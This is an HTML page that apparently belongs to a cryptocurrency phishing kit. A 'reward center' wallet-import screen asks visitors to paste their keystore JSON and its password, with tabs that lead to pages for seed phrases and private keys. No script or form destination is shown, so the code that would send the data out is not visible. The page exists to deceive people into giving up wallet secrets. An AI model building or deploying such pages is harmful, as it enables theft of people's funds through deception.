<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>wallet</title>
    <link rel="icon" href="rewards\favicon.ico?v=2">
    <link rel="stylesheet" href="keystoreJson.css">
</head>
<body>
        
    <div class="flex">
            <div class="col">
                <div class="btn">
                    <div class="wallet">
                        <a href="rewardcenter.html"><p> < Import Wallet</p></a>
                    </div>
                    
                    <div id="phrase">
                        <a href="phrase.html"><span>Phrase</span></a>
                        <a href="keystoreJson.html"><span>KeystoreJSON</span></a>
                        <a href="private.html"><span>PrivateKey</span></a>
                        <hr id="indicator">
                    </div>
                    
                    <form id="keystoreform">
                        <textarea name="text" id="" cols="30" rows="10" placeholder="Keystore-JSON"></textarea>

                        <input type="text" name="pasword" id="text" placeholder="Password">
                        <p>Several lines of text beginning with "{...}" plus the password you used to encrypt it.</p>
                        <a href=""><button class="submit">Submit</button></a>
                   
                    </form>
            
                </div>
            </div>
        </div>        
  
        
</body>
</html>